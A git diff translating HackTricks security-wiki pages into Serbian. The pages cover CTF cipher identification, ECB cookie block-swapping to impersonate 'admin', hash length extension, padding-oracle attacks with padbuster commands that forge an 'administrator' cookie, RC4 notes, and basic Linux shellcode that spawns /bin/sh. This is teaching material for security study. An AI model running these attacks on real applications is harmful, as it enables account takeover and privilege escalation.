-
 ### Affine Cipher Encode
 
-Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and the result back to letter
-
+Pismo u broj `(ax+b)%26` (_a_ i _b_ su ključevi, a _x_ je slovo) i rezultat nazad u slovo
 ```
 krodfdudfrod
 ```
+### SMS Kod
 
-### SMS Code
+**Multitap** [menja slovo](https://www.dcode.fr/word-letter-change) ponovljenim ciframa definisanim odgovarajućim kodom tastera na mobilnom [tastaturi](https://www.dcode.fr/phone-keypad-cipher) (Ovaj način se koristi prilikom pisanja SMS-a).\
+Na primer: 2=A, 22=B, 222=C, 3=D...\
+Možete identifikovati ovaj kod jer ćete videti\*\* nekoliko ponovljenih brojeva\*\*.
 
-**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) (This mode is used when writing SMS).\
-For example: 2=A, 22=B, 222=C, 3=D...\
-You can identify this code because you will see\*\* several numbers repeated\*\*.
+Možete dekodirati ovaj kod na: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
 
-You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
-
-### Bacon Code
-
-Substitude each letter for 4 As or Bs (or 1s and 0s)
+### Bacon Kod
 
+Zamenite svako slovo sa 4 A ili B (ili 1 i 0)
 ```
 00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000
 AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
 ```
-
 ### Runes
 
 ![](../images/runes.jpg)
 
-## Compression
+## Kompresija
 
-**Raw Deflate** and **Raw Inflate** (you can find both in Cyberchef) can compress and decompress data without headers.
+**Raw Deflate** i **Raw Inflate** (možete ih pronaći u Cyberchef-u) mogu kompresovati i dekompresovati podatke bez zaglavlja.
 
-## Easy Crypto
+## Laka Kriptografija
 
 ### XOR - Autosolver
 
@@ -241,30 +219,25 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
 
 ### Bifid
 
-A keywork is needed
-
+Potrebna je ključna reč
 ```
 fgaargaamnlunesuneoa
 ```
-
 ### Vigenere
 
-A keywork is needed
-
+Potreban je ključ.
 ```
 wodsyoidrods
 ```
-
 - [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver)
 - [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher)
 - [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx)
 
-## Strong Crypto
+## Snažna Kriptografija
 
 ### Fernet
 
-2 base64 strings (token and key)
-
+2 base64 stringa (token i ključ)
 ```
 Token:
 gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q==
@@ -272,19 +245,16 @@ gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmC
 Key:
 -s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI=
 ```
-
 - [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode)
 
 ### Samir Secret Sharing
 
-A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
-
+Tajna se deli na X delova i da biste je povratili, potrebna su vam Y dela (_Y <=X_).
 ```
 8019f8fa5879aa3e07858d08308dc1a8b45
 80223035713295bddf0b0bd1b10a5340b89
 803bc8cf294b3f83d88e86d9818792e80cd
 ```
-
 [http://christian.gen.co/secrets/](http://christian.gen.co/secrets/)
 
 ### OpenSSL brute-force
@@ -292,7 +262,7 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
 - [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
 - [https://github.com/carlospolop/easy_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF)
 
-## Tools
+## Alati
 
 - [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
 - [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
diff --git a/src/cryptography/electronic-code-book-ecb.md b/src/cryptography/electronic-code-book-ecb.md
index a09798b1e..f81eb0814 100644
--- a/src/cryptography/electronic-code-book-ecb.md
+++ b/src/cryptography/electronic-code-book-ecb.md
@@ -2,72 +2,66 @@
 
 # ECB
 
-(ECB) Electronic Code Book - symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depends on the size of the block of input data, encryption algorithm) and then to encrypt (decrypt) each block of clear text using the only key.
+(ECB) Elektronska knjiga kodova - simetrična šema enkripcije koja **menja svaki blok otvorenog teksta** sa **blokom šifrovanog teksta**. To je **najjednostavnija** šema enkripcije. Glavna ideja je da se **podeli** otvoreni tekst na **blokove od N bita** (zavisi od veličine bloka ulaznih podataka, algoritma enkripcije) i zatim da se enkriptuje (dekriptuje) svaki blok otvorenog teksta koristeći jedini ključ.
 
 ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png)
 
-Using ECB has multiple security implications:
+Korišćenje ECB ima više bezbednosnih implikacija:
 
-- **Blocks from encrypted message can be removed**
-- **Blocks from encrypted message can be moved around**
+- **Blokovi iz šifrovane poruke mogu biti uklonjeni**
+- **Blokovi iz šifrovane poruke mogu biti pomerani**
 
-# Detection of the vulnerability
+# Otkrivanje ranjivosti
 
-Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`|`**.\
-Then, you generate to new users, both of them with the **same long password** and **almost** the **same** **username**.\
-You find out that the **blocks of 8B** where the **info of both users** is the same are **equals**. Then, you imagine that this might be because **ECB is being used**.
-
-Like in the following example. Observe how these** 2 decoded cookies** has several times the block **`\x23U\xE45K\xCB\x21\xC8`**
+Zamislite da se prijavljujete u aplikaciju nekoliko puta i **uvek dobijate isti kolačić**. To je zato što je kolačić aplikacije **`|`**.\
+Zatim, generišete nove korisnike, oboje sa **istim dugim lozinkama** i **gotovo** **istim** **korisničkim imenima**.\
+Otkrivate da su **blokovi od 8B** gde su **informacije obojice korisnika** iste **jednaki**. Tada zamišljate da bi to moglo biti zato što se **koristi ECB**.
 
+Kao u sledećem primeru. Posmatrajte kako ova **2 dekodirana kolačića** imaju nekoliko puta blok **`\x23U\xE45K\xCB\x21\xC8`**.
 ```
 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
 
 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
 ```
+Ovo je zato što **korisničko ime i lozinka tih kolačića sadrže nekoliko puta slovo "a"** (na primer). **Blokovi** koji su **različiti** su blokovi koji sadrže **barem 1 različit karakter** (možda delimiter "|" ili neka neophodna razlika u korisničkom imenu).
 
-This is because the **username and password of those cookies contained several times the letter "a"** (for example). The **blocks** that are **different** are blocks that contained **at least 1 different character** (maybe the delimiter "|" or some necessary difference in the username).
+Sada, napadaču je potrebno samo da otkrije da li je format `` ili ``. Da bi to uradio, može jednostavno **generisati nekoliko korisničkih imena** sa **sličnim i dugim korisničkim imenima i lozinkama dok ne pronađe format i dužinu delimitera:**
 
-Now, the attacker just need to discover if the format is `` or ``. For doing that, he can just **generate several usernames **with s**imilar and long usernames and passwords until he find the format and the length of the delimiter:**
+| Dužina korisničkog imena: | Dužina lozinke: | Dužina korisničkog imena+lozinke: | Dužina kolačića (nakon dekodiranja): |
+| -------------------------- | ---------------- | --------------------------------- | ------------------------------------- |
+| 2                          | 2                | 4                                 | 8                                   |
+| 3                          | 3                | 6                                 | 8                                   |
+| 3                          | 4                | 7                                 | 8                                   |
+| 4                          | 4                | 8                                 | 16                                  |
+| 7                          | 7                | 14                                | 16                                  |
 
-| Username length: | Password length: | Username+Password length: | Cookie's length (after decoding): |
-| ---------------- | ---------------- | ------------------------- | --------------------------------- |
-| 2                | 2                | 4                         | 8                                 |
-| 3                | 3                | 6                         | 8                                 |
-| 3                | 4                | 7                         | 8                                 |
-| 4                | 4                | 8                         | 16                                |
-| 7                | 7                | 14                        | 16                                |
+# Iskorišćavanje ranjivosti
 
-# Exploitation of the vulnerability
-
-## Removing entire blocks
-
-Knowing the format of the cookie (`|`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it:
+## Uklanjanje celih blokova
 
+Znajući format kolačića (`|`), kako bi se predstavio kao korisnik `admin`, kreirajte novog korisnika pod imenom `aaaaaaaaadmin` i dobijte kolačić i dekodirajte ga:
 ```
 \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
 ```
-
-We can see the pattern `\x23U\xE45K\xCB\x21\xC8` created previously with the username that contained only `a`.\
-Then, you can remove the first block of 8B and you will et a valid cookie for the username `admin`:
-
+Možemo videti obrazac `\x23U\xE45K\xCB\x21\xC8` koji je prethodno kreiran sa korisničkim imenom koje je sadržalo samo `a`.\
+Zatim, možete ukloniti prvi blok od 8B i dobićete važeći kolačić za korisničko ime `admin`:
 ```
 \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
 ```
+## Premještanje blokova
 
-## Moving blocks
+U mnogim bazama podataka je isto pretraživati `WHERE username='admin';` ili `WHERE username='admin    ';` _(Obratite pažnju na dodatne razmake)_
 
-In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin    ';` _(Note the extra spaces)_
+Dakle, drugi način da se impersonira korisnik `admin` bio bi:
 
-So, another way to impersonate the user `admin` would be to:
+- Generisati korisničko ime koje: `len() + len(` će generisati 2 bloka od 8B.
+- Zatim, generisati lozinku koja će popuniti tačan broj blokova koji sadrže korisničko ime koje želimo da impersoniramo i razmake, kao što je: `admin   `
 
-- Generate a username that: `len() + len(` will generate 2 blocks of 8Bs.
-- Then, generate a password that will fill an exact number of blocks containing the username we want to impersonate and spaces, like: `admin   `
+Kolačić ovog korisnika će se sastojati od 3 bloka: prva 2 su blokovi korisničkog imena + delimiter, a treći je lozinka (koja lažira korisničko ime): `username       |admin   `
 
-The cookie of this user is going to be composed by 3 blocks: the first 2 is the blocks of the username + delimiter and the third one of the password (which is faking the username): `username       |admin   `
+**Zatim, samo zamenite prvi blok sa poslednjim i bićete impersonirajući korisnika `admin`: `admin          |username`**
 
-**Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin          |username`**
-
-## References
+## Reference
 
 - [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)]()
 
diff --git a/src/cryptography/hash-length-extension-attack.md b/src/cryptography/hash-length-extension-attack.md
index 837cedd01..9bf823311 100644
--- a/src/cryptography/hash-length-extension-attack.md
+++ b/src/cryptography/hash-length-extension-attack.md
@@ -1,36 +1,36 @@
 {{#include ../banners/hacktricks-training.md}}
 
-# Summary of the attack
+# Sažetak napada
 
-Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know:
+Zamislite server koji **potpisuje** neke **podatke** tako što **dodaje** **tajnu** nekim poznatim čistim tekstualnim podacima i zatim hešira te podatke. Ako znate:
 
-- **The length of the secret** (this can be also bruteforced from a given length range)
-- **The clear text data**
-- **The algorithm (and it's vulnerable to this attack)**
-- **The padding is known**
-  - Usually a default one is used, so if the other 3 requirements are met, this also is
-  - The padding vary depending on the length of the secret+data, that's why the length of the secret is needed
+- **Dužinu tajne** (to se može takođe bruteforce-ovati iz datog opsega dužine)
+- **Čiste tekstualne podatke**
+- **Algoritam (i da je ranjiv na ovaj napad)**
+- **Padding je poznat**
+- Obično se koristi podrazumevani, tako da ako su ispunjena druga 3 zahteva, ovo takođe važi
+- Padding varira u zavisnosti od dužine tajne + podataka, zato je potrebna dužina tajne
 
-Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previous data + appended data**.
+Tada je moguće da **napadač** **doda** **podatke** i **generiše** važeći **potpis** za **prethodne podatke + dodate podatke**.
 
-## How?
+## Kako?
 
-Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**.
+U suštini, ranjivi algoritmi generišu heševe tako što prvo **heširaju blok podataka**, a zatim, **iz** **prethodno** kreiranog **heša** (stanja), **dodaju sledeći blok podataka** i **heširaju ga**.
 
-Then, imagine that the secret is "secret" and the data is "data", the MD5 of "secretdata" is 6036708eba0d11f6ef52ad44e8b74d5b.\
-If an attacker wants to append the string "append" he can:
+Zamislite da je tajna "secret" a podaci su "data", MD5 od "secretdata" je 6036708eba0d11f6ef52ad44e8b74d5b.\
+Ako napadač želi da doda string "append" može:
 
-- Generate a MD5 of 64 "A"s
-- Change the state of the previously initialized hash to 6036708eba0d11f6ef52ad44e8b74d5b
-- Append the string "append"
-- Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"**
+- Generisati MD5 od 64 "A"
+- Promeniti stanje prethodno inicijalizovanog heša na 6036708eba0d11f6ef52ad44e8b74d5b
+- Dodati string "append"
+- Završiti heš i rezultantni heš će biti **važeći za "secret" + "data" + "padding" + "append"**
 
-## **Tool**
+## **Alat**
 
 {% embed url="https://github.com/iagox86/hash_extender" %}
 
-## References
+## Reference
 
-You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
+Ovaj napad je dobro objašnjen na [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/cryptography/padding-oracle-priv.md b/src/cryptography/padding-oracle-priv.md
index 499b42d4b..f68382449 100644
--- a/src/cryptography/padding-oracle-priv.md
+++ b/src/cryptography/padding-oracle-priv.md
@@ -2,26 +2,24 @@
 
 

 
-{% embed url="https://websec.nl/" %}
-
 # CBC - Cipher Block Chaining
 
-In CBC mode the **previous encrypted block is used as IV** to XOR with the next block:
+U CBC režimu **prethodni enkriptovani blok se koristi kao IV** za XOR sa sledećim blokom:
 
 ![https://defuse.ca/images/cbc_encryption.png](https://defuse.ca/images/cbc_encryption.png)
 
-To decrypt CBC the **opposite** **operations** are done:
+Da bi se dekriptovao CBC, vrše se **suprotne** **operacije**:
 
 ![https://defuse.ca/images/cbc_decryption.png](https://defuse.ca/images/cbc_decryption.png)
 
-Notice how it's needed to use an **encryption** **key** and an **IV**.
+Obratite pažnju na to da je potrebno koristiti **ključ za enkripciju** i **IV**.
 
-# Message Padding
+# Poravnanje poruka
 
-As the encryption is performed in **fixed** **size** **blocks**, **padding** is usually needed in the **last** **block** to complete its length.\
-Usually **PKCS7** is used, which generates a padding **repeating** the **number** of **bytes** **needed** to **complete** the block. For example, if the last block is missing 3 bytes, the padding will be `\x03\x03\x03`.
+Kako se enkripcija vrši u **fiksnim** **veličinama** **blokova**, obično je potrebno **poravnanje** u **poslednjem** **bloku** da bi se završila njegova dužina.\
+Obično se koristi **PKCS7**, koji generiše poravnanje **ponavljajući** **broj** **bajtova** **potrebnih** da se **završi** blok. Na primer, ako poslednjem bloku nedostaje 3 bajta, poravnanje će biti `\x03\x03\x03`.
 
-Let's look at more examples with a **2 blocks of length 8bytes**:
+Pogledajmo više primera sa **2 bloka dužine 8 bajtova**:
 
 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0  | byte #1  | byte #2  | byte #3  | byte #4  | byte #5  | byte #6  | byte #7  |
 | ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- |
@@ -30,51 +28,43 @@ Let's look at more examples with a **2 blocks of length 8bytes**:
 | P       | A       | S       | S       | W       | O       | R       | D       | 1        | 2        | 3        | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** |
 | P       | A       | S       | S       | W       | O       | R       | D       | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** |
 
-Note how in the last example the **last block was full so another one was generated only with padding**.
+Obratite pažnju na to kako je u poslednjem primeru **poslednji blok bio pun, pa je generisan još jedan samo sa poravnanjem**.
 
 # Padding Oracle
 
-When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, if an **invalid padding triggers a detectable behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack of results**, or a **slower response**.
+Kada aplikacija dekriptuje enkriptovane podatke, prvo će dekriptovati podatke; zatim će ukloniti poravnanje. Tokom čišćenja poravnanja, ako **nevažeće poravnanje izazove uočljivo ponašanje**, imate **ranjivost padding oracle**. Uočljivo ponašanje može biti **greška**, **nedostatak rezultata** ili **sporiji odgovor**.
 
-If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**.
+Ako primetite ovo ponašanje, možete **dekriptovati enkriptovane podatke** i čak **enkriptovati bilo koji čist tekst**.
 
-## How to exploit
-
-You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do
+## Kako iskoristiti
 
+Možete koristiti [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) da iskoristite ovu vrstu ranjivosti ili samo uradite
 ```
 sudo apt-get install padbuster
 ```
-
-In order to test if the cookie of a site is vulnerable you could try:
-
+Da biste testirali da li je kolačić sajta ranjiv, možete pokušati:
 ```bash
 perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA=="
 ```
+**Encoding 0** znači da se koristi **base64** (ali su dostupni i drugi, proverite meni pomoći).
 
-**Encoding 0** means that **base64** is used (but others are available, check the help menu).
-
-You could also **abuse this vulnerability to encrypt new data. For example, imagine that the content of the cookie is "**_**user=MyUsername**_**", then you may change it to "\_user=administrator\_" and escalate privileges inside the application. You could also do it using `paduster`specifying the -plaintext** parameter:
-
+Takođe možete **iskoristiti ovu ranjivost da enkriptujete nove podatke. Na primer, zamislite da je sadržaj kolačića "**_**user=MyUsername**_**", tada ga možete promeniti u "\_user=administrator\_" i eskalirati privilegije unutar aplikacije. Takođe to možete uraditi koristeći `paduster`specifikujući -plaintext** parametar:
 ```bash
 perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator"
 ```
-
-If the site is vulnerable `padbuster`will automatically try to find when the padding error occurs, but you can also indicating the error message it using the **-error** parameter.
-
+Ako je sajt ranjiv, `padbuster` će automatski pokušati da pronađe kada se javlja greška u punjenju, ali takođe možete naznačiti poruku o grešci koristeći **-error** parametar.
 ```bash
 perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding"
 ```
+## Teorija
 
-## The theory
-
-In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**.
+U **sažetku**, možete početi dekriptovati enkriptovane podatke pogađanjem ispravnih vrednosti koje se mogu koristiti za kreiranje svih **različitih paddinga**. Tada će napad padding oracle početi dekriptovanje bajtova od kraja ka početku pogađajući koja će biti ispravna vrednost koja **stvara padding od 1, 2, 3, itd**.
 
 ![](<../images/image (629) (1) (1).png>)
 
-Imagine you have some encrypted text that occupies **2 blocks** formed by the bytes from **E0 to E15**.\
-In order to **decrypt** the **last** **block** (**E8** to **E15**), the whole block passes through the "block cipher decryption" generating the **intermediary bytes I0 to I15**.\
-Finally, each intermediary byte is **XORed** with the previous encrypted bytes (E0 to E7). So:
+Zamislite da imate neki enkriptovani tekst koji zauzima **2 bloka** formirana bajtovima od **E0 do E15**.\
+Da biste **dekriptovali** **poslednji** **blok** (**E8** do **E15**), ceo blok prolazi kroz "dekripciju blok cifre" generišući **intermedijarne bajtove I0 do I15**.\
+Na kraju, svaki intermedijarni bajt se **XOR-uje** sa prethodnim enkriptovanim bajtovima (E0 do E7). Tako:
 
 - `C15 = D(E15) ^ E7 = I15 ^ E7`
 - `C14 = I14 ^ E6`
@@ -82,33 +72,31 @@ Finally, each intermediary byte is **XORed** with the previous encrypted bytes (
 - `C12 = I12 ^ E4`
 - ...
 
-Now, It's possible to **modify `E7` until `C15` is `0x01`**, which will also be a correct padding. So, in this case: `\x01 = I15 ^ E'7`
+Sada, moguće je **modifikovati `E7` dok `C15` ne bude `0x01`**, što će takođe biti ispravan padding. Tako, u ovom slučaju: `\x01 = I15 ^ E'7`
 
-So, finding E'7, it's **possible to calculate I15**: `I15 = 0x01 ^ E'7`
+Dakle, pronalaženjem E'7, moguće je **izračunati I15**: `I15 = 0x01 ^ E'7`
 
-Which allow us to **calculate C15**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
+Što nam omogućava da **izračunamo C15**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
 
-Knowing **C15**, now it's possible to **calculate C14**, but this time brute-forcing the padding `\x02\x02`.
+Znajući **C15**, sada je moguće **izračunati C14**, ali ovaj put brute-forcing padding `\x02\x02`.
 
-This BF is as complex as the previous one as it's possible to calculate the the `E''15` whose value is 0x02: `E''7 = \x02 ^ I15` so it's just needed to find the **`E'14`** that generates a **`C14` equals to `0x02`**.\
-Then, do the same steps to decrypt C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
+Ovaj BF je jednako složen kao prethodni jer je moguće izračunati `E''15` čija je vrednost 0x02: `E''7 = \x02 ^ I15` tako da je samo potrebno pronaći **`E'14`** koji generiše **`C14` jednako `0x02`**.\
+Zatim, uradite iste korake da dekriptujete C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
 
-**Follow this chain until you decrypt the whole encrypted text.**
+**Pratite chain dok ne dekriptujete ceo enkriptovani tekst.**
 
-## Detection of the vulnerability
+## Detekcija ranjivosti
 
-Register and account and log in with this account .\
-If you **log in many times** and always get the **same cookie**, there is probably **something** **wrong** in the application. The **cookie sent back should be unique** each time you log in. If the cookie is **always** the **same**, it will probably always be valid and there **won't be anyway to invalidate i**t.
+Registrujte se i prijavite sa ovim nalogom.\
+Ako se **prijavljujete više puta** i uvek dobijate **isti cookie**, verovatno postoji **nešto** **pogrešno** u aplikaciji. **Cookie koji se vraća treba da bude jedinstven** svaki put kada se prijavite. Ako je cookie **uvek** **isti**, verovatno će uvek biti važeći i neće biti načina da se **poništi**.
 
-Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\
-But if you BF the padding (using padbuster for example) you manage to get another cookie valid for a different user. This scenario is highly probably vulnerable to padbuster.
+Sada, ako pokušate da **modifikujete** **cookie**, možete videti da dobijate **grešku** iz aplikacije.\
+Ali ako BF-ujete padding (koristeći padbuster na primer) uspete da dobijete drugi cookie važeći za drugog korisnika. Ovaj scenario je veoma verovatno ranjiv na padbuster.
 
-## References
+## Reference
 
 - [https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation)
 
 

 
-{% embed url="https://websec.nl/" %}
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/cryptography/rc4-encrypt-and-decrypt.md b/src/cryptography/rc4-encrypt-and-decrypt.md
index dc89fa296..0e0a77711 100644
--- a/src/cryptography/rc4-encrypt-and-decrypt.md
+++ b/src/cryptography/rc4-encrypt-and-decrypt.md
@@ -1,8 +1,8 @@
 {{#include ../banners/hacktricks-training.md}}
 
-If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function.
+Ako možete na neki način enkriptovati običan tekst koristeći RC4, možete dekriptovati bilo koji sadržaj enkriptovan tim RC4 (koristeći istu lozinku) samo koristeći funkciju enkripcije.
 
-If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
+Ako možete enkriptovati poznati običan tekst, takođe možete izvući lozinku. Više referenci možete pronaći na HTB Kryptos mašini:
 
 {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
 
diff --git a/src/emails-vulns.md b/src/emails-vulns.md
index 15d9cc343..5fb8d5a33 100644
--- a/src/emails-vulns.md
+++ b/src/emails-vulns.md
@@ -1,4 +1,4 @@
-# Emails Vulnerabilities
+# Ranljivosti E-mailova
 
 {{#include ./banners/hacktricks-training.md}}
 
@@ -7,4 +7,3 @@
 ##
 
 {{#include ./banners/hacktricks-training.md}}
-
diff --git a/src/exploiting/linux-exploiting-basic-esp/README.md b/src/exploiting/linux-exploiting-basic-esp/README.md
index b0feaf1a9..6cc5aae2d 100644
--- a/src/exploiting/linux-exploiting-basic-esp/README.md
+++ b/src/exploiting/linux-exploiting-basic-esp/README.md
@@ -4,39 +4,36 @@
 
 ## **2.SHELLCODE**
 
-Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep “\_\_NR\_”
+Ver interrupcije kernela: cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep “\_\_NR\_”
 
 setreuid(0,0); // \_\_NR_setreuid 70\
 execve(“/bin/sh”, args\[], NULL); // \_\_NR_execve 11\
 exit(0); // \_\_NR_exit 1
 
-xor eax, eax ; limpiamos eax\
-xor ebx, ebx ; ebx = 0 pues no hay argumento que pasar\
+xor eax, eax ; čistimo eax\
+xor ebx, ebx ; ebx = 0 jer nema argumenta koji treba proslediti\
 mov al, 0x01 ; eax = 1 —> \_\_NR_exit 1\
-int 0x80 ; Ejecutar syscall
+int 0x80 ; Izvrši syscall
 
-**nasm -f elf assembly.asm** —> Nos devuelve un .o\
-**ld assembly.o -o shellcodeout** —> Nos da un ejecutable formado por el código ensamblador y podemos sacar los opcodes con **objdump**\
-**objdump -d -Mintel ./shellcodeout** —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes
-
-**Comprobar que la shellcode funciona**
+**nasm -f elf assembly.asm** —> Vraća nam .o\
+**ld assembly.o -o shellcodeout** —> Daje nam izvršni fajl sastavljen od asembler koda i možemo izvući opkode sa **objdump**\
+**objdump -d -Mintel ./shellcodeout** —> Da vidimo da je to zaista naš shellcode i izvučemo OpCode
 
+**Proveriti da shellcode funkcioniše**
 ```
 char shellcode[] = “\x31\xc0\x31\xdb\xb0\x01\xcd\x80”
 
 void main(){
-            void (*fp) (void);
-            fp = (void *)shellcode;
-            fp();
+void (*fp) (void);
+fp = (void *)shellcode;
+fp();
 }
 ```
+Da biste videli da se sistemski pozivi pravilno izvršavaju, potrebno je da kompajlirate prethodni program i sistemski pozivi treba da se pojave u **strace ./PROGRAMA_COMPILADO**.
 
-Para ver que las llamadas al sistema se realizan correctamente se debe compilar el programa anterior y las llamadas del sistema deben aparecer en **strace ./PROGRAMA_COMPILADO**
-
-A la hora de crear shellcodes se puede realizar un truco. La primera instrucción es un jump a un call. El call llama al código original y además mete en el stack el EIP. Después de la instrucción call hemos metido el string que necesitásemos, por lo que con ese EIP podemos señalar al string y además continuar ejecutando el código.
-
-EJ **TRUCO (/bin/sh)**:
+Kada se kreiraju shellcode-ovi, može se primeniti trik. Prva instrukcija je jump na call. Call poziva originalni kod i takođe stavlja EIP na stek. Nakon instrukcije call, stavili smo string koji nam je potreban, tako da sa tim EIP-om možemo ukazati na string i nastaviti sa izvršavanjem koda.
 
+EJ **TRIK (/bin/sh)**:
 ```
 jmp                 0x1f                                        ; Salto al último call
 popl                %esi                                       ; Guardamos en ese la dirección al string
@@ -56,9 +53,7 @@ int                    $0x80                         ; exit(0)
 call                  -0x24                          ; Salto a la primera instrución
 .string             \”/bin/sh\”                               ; String a usar
 ```
-
-**EJ usando el Stack(/bin/sh):**
-
+**EJ koristeći Stack(/bin/sh):**
 ```
 section .text
 global _start
@@ -79,54 +74,49 @@ mov                ecx, esp                     ; arg2 = args[]
 mov                al, 0x0b                      ; Syscall 11
 int                    0x80                           ; excve(“/bin/sh”, args[“/bin/sh”, “NULL”], NULL)
 ```
-
 **EJ FNSTENV:**
-
 ```
 fabs
 fnstenv [esp-0x0c]
 pop eax                     ; Guarda el EIP en el que se ejecutó fabs
 …
 ```
-
 **Egg Huter:**
 
-Consiste en un pequeño código que recorre las páginas de memoria asociadas a un proceso en busca de la shellcode ahi guardada (busca alguna firma puesta en la shellcode). Útil en los casos en los que solo se tiene un pequeño espacio para inyectar código.
+Sastoji se od malog koda koji pretražuje stranice memorije povezane sa procesom u potrazi za shellcode-om koji je tamo sačuvan (traži neku potpisanu shellcode). Korisno u slučajevima kada se ima samo mali prostor za injektovanje koda.
 
-**Shellcodes polimórficos**
-
-Consisten el shells cifradas que tienen un pequeño códigos que las descifran y saltan a él, usando el truco de Call-Pop este sería un **ejemplo cifrado cesar**:
+**Shellcodes polimorfni**
 
